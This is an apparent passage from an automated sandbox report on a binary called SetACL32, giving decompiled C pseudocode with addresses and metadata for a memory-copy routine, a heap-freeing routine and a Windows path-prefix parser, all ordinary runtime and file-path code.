																	_t251 = _t251 - 0x20;
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t206 = _t206 - 0x20;
																	__eflags = _t206 & 0xffffffe0;
																} while ((_t206 & 0xffffffe0) != 0);
															}
															goto L83;
														}
														goto L79;
													} else {
														__eflags = _t251 & 0x00000003;
														if((_t251 & 0x00000003) != 0) {
															_t239 = _t251 & 0x00000003;
															_t206 = _t206 - _t239;
															__eflags = _t206;
															do {
																 *(_t251 - 1) =  *((intOrPtr*)(_t267 - 1));
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																_t239 = _t239 - 1;
																__eflags = _t239;
															} while (_t239 != 0);
														}
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L83;
														} else {
															asm("std");
															memcpy(_t251 - 4, _t267 - 4, _t206 >> 2 << 2);
															asm("cld");
															switch( *((intOrPtr*)((_t206 & 0x00000003) * 4 +  &M012CCB10))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	_t113 = __esi + 3; // 0x36ebc033
																	 *((char*)(__edi + 3)) =  *_t113;
																	_t115 = __esi + 2; // 0xebc0330c
																	 *((char*)(__edi + 2)) =  *_t115;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
																	 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											} else {
												goto L25;
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L108;
							L7:
							_t241 = _t196;
						} while (_t196 != 0xfffffffe);
						if(_t202 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L108:
			}
























































              0x012cc6a0
              0x012cc6a7
              0x012cc6ab
              0x012cc6ac
              0x012cc6b2
              0x012cc6be
              0x012cc6c0
              0x012cc6c6
              0x012cc6c6
              0x012cc6cf
              0x012cc6d1
              0x012cc6d4
              0x012cc6d7
              0x012cc6df
              0x012cc6e4
              0x012cc6e7
              0x012cc6ea
              0x012cc6f1
              0x012cc74d
              0x012cc750
              0x012cc758
              0x012cc75f
              0x00000000
              0x012cc75f
              0x00000000
              0x012cc6f3
              0x012cc6f3
              0x012cc6f9
              0x012cc6ff
              0x012cc705
              0x012cc770
              0x012cc779
              0x012cc707
              0x012cc707
              0x012cc707
              0x012cc70d
              0x012cc710
              0x012cc713
              0x012cc716
              0x012cc719
              0x012cc71e
              0x012cc734
              0x00000000
              0x012cc720
              0x012cc720
              0x012cc722
              0x012cc727
              0x012cc729
              0x012cc72c
              0x012cc72e
              0x012cc744
              0x012cc764
              0x012cc764
              0x012cc768
              0x00000000
              0x012cc730
              0x012cc730
              0x012cc77a
              0x012cc77d
              0x012cc783
              0x012cc785
              0x012cc78c
              0x012cc793
              0x012cc798
              0x012cc79b
              0x012cc79d
              0x012cc79f
              0x012cc7ac
              0x012cc7b2
              0x012cc7b4
              0x012cc7b7
              0x012cc7b7
              0x012cc7ba
              0x012cc7ba
              0x012cc78c
              0x012cc7c0
              0x012cc7c2
              0x012cc7c7
              0x012cc7ca
              0x012cc7cd
              0x012cc7d5
              0x012cc7d9
              0x012cc7de
              0x012cc7de
              0x012cc7e1
              0x012cc7e5
              0x012cc7e8
              0x012cc7f8
              0x012cc7fd
              0x012cc7fe
              0x012cc7ff
              0x012cc800
              0x012cc801
              0x012cc802
              0x012cc806
              0x012cc80a
              0x012cc812
              0x012cc814
              0x012cc816
              0x012cc820
              0x012cc820
              0x012cc823
              0x012cccfb
              0x012cccfb
              0x012cccfb
              0x012cccfe
              0x012ccd00
              0x012ccd02
              0x012ccd02
              0x012ccd05
              0x012ccd09
              0x012ccd0b
              0x012ccd0e
              0x012ccd11
              0x012ccd11
              0x012ccd11
              0x012ccd18
              0x012ccd18
              0x012ccd1b
              0x012ccd1f
              0x012ccd21
              0x012ccd22
              0x012ccd23
              0x012ccd23
              0x012ccd23
              0x012ccd1b
              0x00000000
              0x012cc829
              0x012cc829
              0x012cc82f
              0x012cc844
              0x012cc84c
              0x012cc85b
              0x012cc860
              0x012cc870
              0x012cc870
              0x012cc878
              0x00000000
              0x012cc87e
              0x012cc87e
              0x012cc884
              0x00000000
              0x012cc88a
              0x012cc88a
              0x012cc890
              0x012cc896
              0x012cc89a
              0x012cc89c
              0x012cc89e
              0x012cc89e
              0x012cc8a1
              0x012cc8a4
              0x012cc8a6
              0x012cc8a6
              0x012cc8a9
              0x012cc8ad
              0x012cc8af
              0x012cc8b3
              0x012cc8b3
              0x012cc8b6
              0x012cc8b9
              0x012cc8bd
              0x012cc8bd
              0x012cc8c0
              0x012cc8c6
              0x012cc92d
              0x012cc932
              0x012cc938
              0x012cc938
              0x012cc93d
              0x012cc940
              0x012cc945
              0x012cc94a
              0x012cc94d
              0x012cc950
              0x012cc954
              0x012cc95a
              0x012cc95e
              0x012cc962
              0x012cc968
              0x012cc96d
              0x012cc971
              0x012cc977
              0x012cc97c
              0x012cc97c
              0x012cc981
              0x012cc8c8
              0x012cc8c8
              0x012cc8cc
              0x012cc986
              0x012cc98b
              0x012cc990
              0x012cc990
              0x012cc995
              0x012cc998
              0x012cc99d
              0x012cc9a2
              0x012cc9a5
              0x012cc9a8
              0x012cc9ac
              0x012cc9b2
              0x012cc9b6
              0x012cc9ba
              0x012cc9c0
              0x012cc9c5
              0x012cc9c9
              0x012cc9cf
              0x012cc9d4
              0x012cc9d4
              0x012cc9d9
              0x012cc9dc
              0x012cc9dc
              0x012cc9dc
              0x012cc9df
              0x00000000
              0x00000000
              0x012cc9e1
              0x012cc9e5
              0x012cc9e8
              0x012cc9eb
              0x012cc9ef
              0x012cc9ef
              0x012cc9f4
              0x012cc9f8
              0x012cc9fa
              0x012cc9fc
              0x012cc9fc
              0x012cc9ff
              0x012cca02
              0x012cca04
              0x012cca04
              0x012cca07
              0x012cca0b
              0x012cca0d
              0x012cca11
              0x012cca14
              0x012cca17
              0x012cca1b
              0x012cca1b
              0x012cca25
              0x012cca25
              0x012cc8d2
              0x012cc8d7
              0x012cc8dc
              0x012cc8dc
              0x012cc8e1
              0x012cc8e4
              0x012cc8e9
              0x012cc8ee
              0x012cc8f1
              0x012cc8f4
              0x012cc8f8
              0x012cc8fe
              0x012cc902
              0x012cc906
              0x012cc90c
              0x012cc911
              0x012cc915
              0x012cc91b
              0x012cc920
              0x012cc920
              0x012cc925
              0x012cc925
              0x00000000
              0x012cc8c6
              0x012cc890
              0x012cc884
              0x00000000
              0x012cc862
              0x012cc862
              0x012cc86a
              0x012ccc52
              0x012ccc55
              0x012ccc57
              0x012ccd49
              0x012ccd4a
              0x012ccd4e
              0x012ccd4e
              0x012ccd51
              0x012ccd55
              0x012ccd57
              0x012ccd58
              0x012ccd59
              0x012ccd59
              0x012ccd59
              0x012ccd5c
              0x012ccd5c
              0x012ccd5f
              0x012ccd63
              0x012ccd65
              0x012ccd68
              0x012ccd6b
              0x012ccd6b
              0x012ccd6b
              0x012ccd6e
              0x012ccd6e
              0x012ccc5d
              0x012ccc5f
              0x012ccc62
              0x012ccc62
              0x012ccc65
              0x012ccc70
              0x012ccc74
              0x012ccc79
              0x012ccc7e
              0x012ccc83
              0x012ccc87
              0x012ccc8c
              0x012ccc91
              0x012ccc96
              0x012ccc9b
              0x012ccca0
              0x012ccca5
              0x012cccaa
              0x012cccaf
              0x012cccb4
              0x012cccb9
              0x012cccbe
              0x012cccc4
              0x012cccca
              0x012cccca
              0x012cccca
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012cc86a
              0x012cc84e
              0x012cc84e
              0x012cc856
              0x012cc856
              0x012cc831
              0x012cc831
              0x012cc839
              0x012ccccd
              0x012ccccd
              0x012ccccf
              0x012cccd3
              0x012cccd6
              0x012cccd8
              0x012ccce0
              0x012ccce0
              0x012ccce4
              0x012ccce9
              0x012ccced
              0x012cccf2
              0x012cccf5
              0x012cccf8
              0x012cccf8
              0x012cccf8
              0x012ccce0
              0x00000000
              0x012cccd8
              0x012ccd30
              0x012ccd36
              0x012cc83f
              0x012cca27
              0x012cca27
              0x012cca2d
              0x012cca31
              0x012cca33
              0x012cca34
              0x012cca37
              0x012cca3a
              0x012cca3a
              0x012cca42
              0x012cca42
              0x012cca44
              0x012cca47
              0x00000000
              0x012cca4d
              0x012cca50
              0x012cca55
              0x00000000
              0x012cca7a
              0x00000000
              0x00000000
              0x012cca7e
              0x012cca80
              0x012cca84
              0x012cca85
              0x012cca86
              0x00000000
              0x00000000
              0x012cca8a
              0x012cca8c
              0x012cca8f
              0x012cca92
              0x012cca96
              0x012cca97
              0x012cca98
              0x00000000
              0x00000000
              0x012cca9e
              0x012ccaa3
              0x012ccaa9
              0x012ccaac
              0x012ccab0
              0x012ccab1
              0x012ccab2
              0x00000000
              0x00000000
              0x012cca55
              0x012cca47
              0x012cc839
              0x012cc82f
              0x012cc818
              0x012cc818
              0x012cc81a
              0x012ccab4
              0x012ccab7
              0x012ccaba
              0x012ccabd
              0x012ccc14
              0x012ccc14
              0x012ccc1a
              0x012ccc1c
              0x012ccc1f
              0x012ccc24
              0x012ccc26
              0x012ccc29
              0x012ccc29
              0x012ccc31
              0x012ccc33
              0x012ccc35
              0x012ccc35
              0x012ccc38
              0x012ccc3d
              0x012ccc3f
              0x012ccc3f
              0x012ccc3f
              0x012ccc35
              0x012ccc4a
              0x012ccac3
              0x012ccac3
              0x012ccacb
              0x012ccb65
              0x012ccb6b
              0x012ccb6d
              0x012ccb6d
              0x012ccb6e
              0x012ccb6f
              0x012ccb72
              0x012ccb74
              0x012ccb74
              0x012ccb7c
              0x012ccb7c
              0x012ccb7c
              0x012ccb82
              0x00000000
              0x00000000
              0x012ccb84
              0x012ccb8a
              0x012ccb90
              0x012ccb94
              0x012ccb99
              0x012ccb9e
              0x012ccba3
              0x012ccba8
              0x012ccbad
              0x012ccbb2
              0x012ccbb7
              0x012ccbbb
              0x012ccbc0
              0x012ccbc5
              0x012ccbca
              0x012ccbcf
              0x012ccbd4
              0x012ccbd9
              0x012ccbde
              0x012ccbe4
              0x012ccbea
              0x00000000
              0x00000000
              0x00000000
              0x012ccbea
              0x012ccbec
              0x012ccbef
              0x012ccbf1
              0x012ccbf1
              0x012ccbf4
              0x012ccbf7
              0x012ccbfb
              0x012ccc00
              0x012ccc04
              0x012ccc09
              0x012ccc0c
              0x012ccc0c
              0x012ccbf1
              0x00000000
              0x012ccbef
              0x00000000
              0x012ccad1
              0x012ccad1
              0x012ccad7
              0x012ccadb
              0x012ccade
              0x012ccade
              0x012ccae0
              0x012ccae3
              0x012ccae6
              0x012ccae7
              0x012ccae8
              0x012ccae8
              0x012ccae8
              0x012ccae0
              0x012ccaed
              0x012ccaf0
              0x00000000
              0x012ccaf6
              0x012ccb04
              0x012ccb05
              0x012ccb07
              0x012ccb08
              0x00000000
              0x012ccb26
              0x00000000
              0x00000000
              0x012ccb2b
              0x012ccb2e
              0x012ccb32
              0x012ccb33
              0x012ccb34
              0x00000000
              0x00000000
              0x012ccb38
              0x012ccb3b
              0x012ccb3e
              0x012ccb41
              0x012ccb44
              0x012ccb48
              0x012ccb49
              0x012ccb4a
              0x00000000
              0x00000000
              0x012ccb4f
              0x012ccb55
              0x012ccb5b
              0x012ccb5e
              0x012ccb62
              0x012ccb63
              0x012ccb64
              0x00000000
              0x00000000
              0x012ccb08
              0x012ccaf0
              0x012ccacb
              0x00000000
              0x00000000
              0x00000000
              0x012cc81a
              0x012cc732
              0x00000000
              0x012cc732
              0x012cc730
              0x012cc72e
              0x00000000
              0x012cc737
              0x012cc737
              0x012cc739
              0x012cc740
              0x00000000
              0x012cc742
              0x00000000
              0x012cc740
              0x012cc705
              0x00000000

              APIs
              • _ValidateLocalCookies.LIBCMT ref: 012CC6D7
              • ___except_validate_context_record.LIBVCRUNTIME ref: 012CC6DF
              • _ValidateLocalCookies.LIBCMT ref: 012CC768
              • __IsNonwritableInCurrentImage.LIBCMT ref: 012CC793
              • _ValidateLocalCookies.LIBCMT ref: 012CC7E8
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: csm
              • API String ID: 1170836740-1018135373
              • Opcode ID: 5e4338a466d669828917ed4400bca5d7ca609eb9a397dbaaf570423cd5fdbf07
              • Instruction ID: 8c22f9eb0c533cea7fdb4ef16f4dec65dafec0af159a5149bf010826b65f00f2
              • Opcode Fuzzy Hash: 5e4338a466d669828917ed4400bca5d7ca609eb9a397dbaaf570423cd5fdbf07
              • Instruction Fuzzy Hash: 1041D734A1020A9FCF14DF6CC884AAE7FA5EF45B24F148259DB185B351C7319A25CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D7E53 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E012D7E53(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E012D7B9F(_t45, 7);
					E012D7B9F(_t45 + 0x1c, 7);
					E012D7B9F(_t45 + 0x38, 0xc);
					E012D7B9F(_t45 + 0x68, 0xc);
					E012D7B9F(_t45 + 0x98, 2);
					E012D800F( *((intOrPtr*)(_t45 + 0xa0)));
					E012D800F( *((intOrPtr*)(_t45 + 0xa4)));
					E012D800F( *((intOrPtr*)(_t45 + 0xa8)));
					E012D7B9F(_t45 + 0xb4, 7);
					E012D7B9F(_t45 + 0xd0, 7);
					E012D7B9F(_t45 + 0xec, 0xc);
					E012D7B9F(_t45 + 0x11c, 0xc);
					E012D7B9F(_t45 + 0x14c, 2);
					E012D800F( *((intOrPtr*)(_t45 + 0x154)));
					E012D800F( *((intOrPtr*)(_t45 + 0x158)));
					E012D800F( *((intOrPtr*)(_t45 + 0x15c)));
					return E012D800F( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




              0x012d7e59
              0x012d7e5e
              0x012d7e67
              0x012d7e72
              0x012d7e7d
              0x012d7e88
              0x012d7e96
              0x012d7ea1
              0x012d7eac
              0x012d7eb7
              0x012d7ec5
              0x012d7ed3
              0x012d7ee4
              0x012d7ef2
              0x012d7f00
              0x012d7f0b
              0x012d7f16
              0x012d7f21
              0x00000000
              0x012d7f31
              0x012d7f36

              APIs
                • Part of subcall function 012D7B9F: _free.LIBCMT ref: 012D7BC4
              • _free.LIBCMT ref: 012D7EA1
                • Part of subcall function 012D800F: HeapFree.KERNEL32(00000000,00000000,?,012D6ACD), ref: 012D8025
                • Part of subcall function 012D800F: GetLastError.KERNEL32(?,?,012D6ACD), ref: 012D8037
              • _free.LIBCMT ref: 012D7EAC
              • _free.LIBCMT ref: 012D7EB7
              • _free.LIBCMT ref: 012D7F0B
              • _free.LIBCMT ref: 012D7F16
              • _free.LIBCMT ref: 012D7F21
              • _free.LIBCMT ref: 012D7F2C
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: a2948cd45a09085361632f2f8d60afe16e586b543b1255bd1d48c816b59ba376
              • Instruction ID: c6c10da5e244ca5b33ede8a2dbc62a261091b300fcdc1fb72477350e5e36dda1
              • Opcode Fuzzy Hash: a2948cd45a09085361632f2f8d60afe16e586b543b1255bd1d48c816b59ba376
              • Instruction Fuzzy Hash: 59116D71A60B05BFD630BBB0CC45FEB7B9CAF24715F400815E3A9AA091FB79B5149750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012A2EE0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 497COMMON
              Download Yara Rule
              C-Code - Quality: 61%
              			E012A2EE0(void* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi, void* __fp0, signed int* _a4, signed int _a20, signed int _a24) {
				signed int _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v44;
				void* _v45;
				signed int _v46;
				signed int* _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				signed int _t159;
				signed int _t160;
				short* _t162;
				signed int* _t165;
				signed int _t172;
				signed int _t176;
				signed int _t179;
				signed int _t184;
				signed int _t185;
				signed int _t192;
				void* _t196;
				signed int _t203;
				signed int _t211;
				signed int _t219;
				void* _t222;
				signed int _t224;
				signed int _t226;
				signed int _t231;
				signed int _t233;
				signed int _t238;
				signed int _t240;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t250;
				signed int _t253;
				signed int* _t258;
				signed int _t261;
				signed int* _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				void* _t288;
				signed int _t289;
				void* _t290;
				signed int _t294;
				signed int _t298;
				signed int _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				signed int _t309;
				void* _t311;
				void* _t312;
				signed int _t313;
				void* _t314;
				signed int* _t315;
				signed int _t317;
				signed int _t318;
				signed int _t321;
				signed int _t323;
				signed int* _t324;
				signed int* _t328;
				void* _t351;

				_t351 = __fp0;
				_t313 = __esi;
				_t321 = _t323;
				_push(0xffffffff);
				_push(0x12e990d);
				_push( *[fs:0x0]);
				_t324 = _t323 - 0x34;
				_t159 =  *0x1309018; // 0xedd8d3b4
				_t160 = _t159 ^ _t321;
				_v20 = _t160;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t160);
				 *[fs:0x0] =  &_v16;
				_t246 = __edx;
				_v64 = __edx;
				_t282 = __ecx;
				_v56 = __ecx;
				_v8 = 0;
				_t162 = __edx;
				_v45 = 0;
				if( *((intOrPtr*)(__edx + 0x14)) >= 8) {
					_t162 =  *__edx;
				}
				 *(_t246 + 0x10) = 0;
				 *_t162 = 0;
				_t253 = _a20;
				if(_t253 == 0 || _t282 != 1 && _t282 != 4 || _t253 <= 2) {
					L30:
					_t247 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t178 =  >=  ? _a4 :  &_a4;
					if( *((short*)(( >=  ? _a4 :  &_a4) + 2)) != 0x3a || _t253 != 3) {
						_t328 = _t324 - 0xc;
						_t263 = _t328;
						_v52 = _t263;
						_v52 = 0;
						_t263[2] = 1;
						 *_t263 = 0;
						_t179 = "\\"; // 0x5c
						 *_t263 = _t179;
						E0129E540(_t263, _t263 + _t263[2], _t263 + _t263[2] - _t263, _v52);
						_t264 =  &_a4;
						E012A35B0(_t246, _t264);
						_t184 = _a20;
						_t324 =  &(_t328[5]);
						_t317 = _t313 | 0xffffffff;
						_t312 = 0;
						_t265 = _t264 & 0xffffff00 | _a24 - 0x00000008 >= 0x00000000;
						_v46 = _t265;
						while(1) {
							_t313 = _t317 + 1;
							_t250 =  !=  ? _a4 :  &_a4;
							if(_t313 >= _t184) {
								break;
							}
							_t309 = _t250 + _t313 * 2;
							_t265 = _t184 - _t313;
							_t313 = 0;
							if(_t265 != 0) {
								if( *_t309 == 0x5c) {
									L14:
									_t313 = _t309;
								} else {
									while(_t265 != 1) {
										_t309 = _t309 + 2;
										_t265 = _t265 - 1;
										if( *_t309 != 0x5c) {
											continue;
										} else {
											goto L14;
										}
										goto L15;
									}
								}
								L15:
								_t184 = _a20;
							}
							if(_t313 != 0) {
								_t313 = _t313 - _t250 >> 1;
								if(_t313 != 0xffffffff) {
									_t265 = _v46;
									_t312 = _t312 + 1;
									continue;
								}
							}
							break;
						}
						_t185 = _v56;
						__eflags = _t185 - 1;
						if(__eflags != 0) {
							__eflags = _t185 - 4;
							if(_t185 == 4) {
								L68:
								__eflags = _t312 - 1;
								goto L29;
							} else {
								__eflags = _t185 - 0xb;
								if(_t185 != 0xb) {
									goto L55;
								} else {
									goto L68;
								}
							}
						} else {
							_push(_t185);
							_v8 = _t185;
							_t313 = E012C9DCB(_t250, _t312, _t313, __eflags);
							_v56 = _t313;
							_v8 = 2;
							_v44 = 0;
							_v44 = 0;
							__eflags = _a20 - 8;
							_v28 = 0;
							_t292 =  <  ? _a20 : 8;
							__eflags = _a24 - 8;
							_t200 =  >=  ? _a4 :  &_a4;
							_v24 = 7;
							E012A1EE0(_t250,  &_v44,  <  ? _a20 : 8, _t312, _t313,  >=  ? _a4 :  &_a4, 8);
							_v8 = 3;
							_push( &_v60);
							_t265 =  &_v44;
							_t203 = E01298900(_t265, L"\\\\?\\UNC\\");
							_v8 = 2;
							_t324 =  &(_t324[2]);
							_t294 = _v24;
							_t247 = _t203;
							__eflags = _t294 - 8;
							if(_t294 < 8) {
								L24:
								_v28 = 0;
								_v24 = 7;
								_v44 = 0;
								_v8 = 0;
								__eflags = _t313;
								if(_t313 != 0) {
									_t265 = _t313;
									_t238 =  *((intOrPtr*)( *_t313 + 8))();
									__eflags = _t238;
									if(_t238 != 0) {
										_t265 = _t238;
										 *((intOrPtr*)( *((intOrPtr*)( *_t238))))(1);
									}
								}
								__eflags = _t247;
								if(__eflags == 0) {
									_push(1);
									_v8 = 4;
									_t313 = E012C9DCB(_t247, _t312, _t313, __eflags);
									_v56 = _t313;
									_v8 = 5;
									_v44 = 0;
									_v44 = 0;
									__eflags = _a20 - 4;
									_v28 = 0;
									_t296 =  <  ? _a20 : 4;
									__eflags = _a24 - 8;
									_t208 =  >=  ? _a4 :  &_a4;
									_v24 = 7;
									E012A1EE0(_t247,  &_v44,  <  ? _a20 : 4, _t312, _t313,  >=  ? _a4 :  &_a4, 4);
									_v8 = 6;
									_push( &_v60);
									_t265 =  &_v44;
									_t211 = E01298900(_t265, L"\\\\?\\");
									_v8 = 5;
									_t324 =  &(_t324[2]);
									_t298 = _v24;
									_t247 = _t211;
									__eflags = _t298 - 8;
									if(_t298 < 8) {
										L39:
										_v28 = 0;
										_v24 = 7;
										_v44 = 0;
										_v8 = 0;
										__eflags = _t313;
										if(_t313 != 0) {
											_t265 = _t313;
											_t231 =  *((intOrPtr*)( *_t313 + 8))();
											__eflags = _t231;
											if(_t231 != 0) {
												_t265 = _t231;
												 *((intOrPtr*)( *((intOrPtr*)( *_t231))))(1);
											}
										}
										__eflags = _t247;
										if(__eflags == 0) {
											_push(1);
											_v8 = 7;
											_t313 = E012C9DCB(_t247, _t312, _t313, __eflags);
											_v56 = _t313;
											_v8 = 8;
											_v44 = 0;
											_v44 = 0;
											__eflags = _a20 - 2;
											_v28 = 0;
											_t300 =  <  ? _a20 : 2;
											__eflags = _a24 - 8;
											_t216 =  >=  ? _a4 :  &_a4;
											_v24 = 7;
											E012A1EE0(_t247,  &_v44,  <  ? _a20 : 2, _t312, _t313,  >=  ? _a4 :  &_a4, 2);
											_v8 = 9;
											_push( &_v60);
											_t265 =  &_v44;
											_t219 = E01298900(_t265, L"\\\\");
											_v8 = 8;
											_t324 =  &(_t324[2]);
											_t302 = _v24;
											_t247 = _t219;
											__eflags = _t302 - 8;
											if(_t302 < 8) {
												L49:
												_v28 = 0;
												_v24 = 7;
												_v44 = 0;
												_v8 = 0;
												__eflags = _t313;
												if(_t313 != 0) {
													_t265 = _t313;
													_t224 =  *((intOrPtr*)( *_t313 + 8))();
													__eflags = _t224;
													if(_t224 != 0) {
														_t265 = _t224;
														 *((intOrPtr*)( *_t224))(1);
													}
												}
												__eflags = _t247;
												if(_t247 == 0) {
													__eflags = _a24 - 8;
													_t222 =  >=  ? _a4 :  &_a4;
													__eflags =  *((short*)(_t222 + 2)) - 0x3a;
													if( *((short*)(_t222 + 2)) != 0x3a) {
														__eflags = _t312 - 1;
														goto L54;
													} else {
														__eflags = _t312 - 1;
														if(__eflags < 0) {
															goto L30;
														} else {
															_t247 = _t247 & 0xffffff00 | __eflags == 0x00000000;
															goto L56;
														}
													}
												} else {
													__eflags = _t312 - 4;
													L54:
													if(__eflags < 0) {
														goto L30;
													} else {
														goto L55;
													}
												}
											} else {
												_t265 = _v44;
												_t304 = 2 + _t302 * 2;
												_t226 = _t265;
												__eflags = _t304 - 0x1000;
												if(_t304 < 0x1000) {
													L48:
													_push(_t304);
													E012CAE27(_t265);
													_t324 =  &(_t324[2]);
													goto L49;
												} else {
													_t258 =  *(_t265 - 4);
													_t283 = _t304 + 0x23;
													__eflags = _t226 - _t258 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L82;
													} else {
														goto L48;
													}
												}
											}
										} else {
											__eflags = _t312 - 4;
											if(__eflags < 0) {
												goto L30;
											} else {
												_t247 = _t247 & 0xffffff00 | __eflags == 0x00000000;
												goto L56;
											}
										}
									} else {
										_t265 = _v44;
										_t306 = 2 + _t298 * 2;
										_t233 = _t265;
										__eflags = _t306 - 0x1000;
										if(_t306 < 0x1000) {
											L38:
											_push(_t306);
											E012CAE27(_t265);
											_t324 =  &(_t324[2]);
											goto L39;
										} else {
											_t258 =  *(_t265 - 4);
											_t283 = _t306 + 0x23;
											__eflags = _t233 - _t258 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L81;
											} else {
												goto L38;
											}
										}
									}
								} else {
									__eflags = _t312 - 6;
									L29:
									if(__eflags >= 0) {
										L55:
										_t247 = _v45;
										L56:
										__eflags = _a24 - 8;
										_t318 = _a20;
										_t288 =  >=  ? _a4 :  &_a4;
										__eflags = _t318;
										if(_t318 == 0) {
											L69:
											_t266 = _t265 | 0xffffffff;
											__eflags = _t266;
										} else {
											_t272 = _t265 | 0xffffffff;
											_t125 = _t318 - 1; // -1
											_t196 = _t125;
											__eflags = _t196 - _t272;
											_t273 =  <  ? _t196 : _t272;
											__eflags =  *(_t288 + _t273 * 2) - 0x5c;
											_t265 = _t288 + _t273 * 2;
											if( *(_t288 + _t273 * 2) == 0x5c) {
												L61:
												_t266 = _t265 - _t288 >> 1;
											} else {
												while(1) {
													__eflags = _t265 - _t288;
													if(_t265 == _t288) {
														goto L69;
													}
													_t265 = _t265 - 2;
													__eflags =  *_t265 - 0x5c;
													if( *_t265 != 0x5c) {
														continue;
													} else {
														goto L61;
													}
													goto L70;
												}
												goto L69;
											}
										}
										L70:
										__eflags = _t318 - _t266;
										_v44 = 0;
										_v28 = 0;
										_t267 =  <  ? _t318 : _t266;
										_v24 = 7;
										__eflags = _a24 - 8;
										_t187 =  >=  ? _a4 :  &_a4;
										E012A1EE0(_t247,  &_v44, _t288, _t312, _t318,  >=  ? _a4 :  &_a4,  <  ? _t318 : _t266);
										_t313 = _v64;
										E012982B0(_t247, _t313,  &_v44);
										_t289 = _v24;
										__eflags = _t289 - 8;
										if(_t289 < 8) {
											L74:
											__eflags = _t247;
											if(_t247 != 0) {
												_push(1);
												E01299A40(_t313, _t351, "\\");
											}
											_t247 = 1;
											L31:
											_t283 = _a24;
											__eflags = _t283 - 8;
											if(_t283 < 8) {
												L78:
												 *[fs:0x0] = _v16;
												_pop(_t311);
												_pop(_t314);
												_pop(_t248);
												__eflags = _v20 ^ _t321;
												return E012CAE19(_t247, _t248, _v20 ^ _t321, _t283, _t311, _t314);
											} else {
												_t258 = _a4;
												_t283 = 2 + _t283 * 2;
												_t165 = _t258;
												__eflags = _t283 - 0x1000;
												if(_t283 < 0x1000) {
													L77:
													_push(_t283);
													E012CAE27(_t258);
													goto L78;
												} else {
													_t258 =  *(_t258 - 4);
													_t283 = _t283 + 0x23;
													__eflags = _t165 - _t258 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L80;
													} else {
														goto L77;
													}
												}
											}
										} else {
											_t271 = _v44;
											_t290 = 2 + _t289 * 2;
											_t192 = _t271;
											__eflags = _t290 - 0x1000;
											if(_t290 < 0x1000) {
												L73:
												_push(_t290);
												E012CAE27(_t271);
												_t324 =  &(_t324[2]);
												goto L74;
											} else {
												_t258 =  *(_t271 - 4);
												_t283 = _t290 + 0x23;
												__eflags = _t192 - _t258 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L80;
												} else {
													goto L73;
												}
											}
										}
									} else {
										goto L30;
									}
								}
							} else {
								_t265 = _v44;
								_t308 = 2 + _t294 * 2;
								_t240 = _t265;
								__eflags = _t308 - 0x1000;
								if(_t308 < 0x1000) {
									L23:
									_push(_t308);
									E012CAE27(_t265);
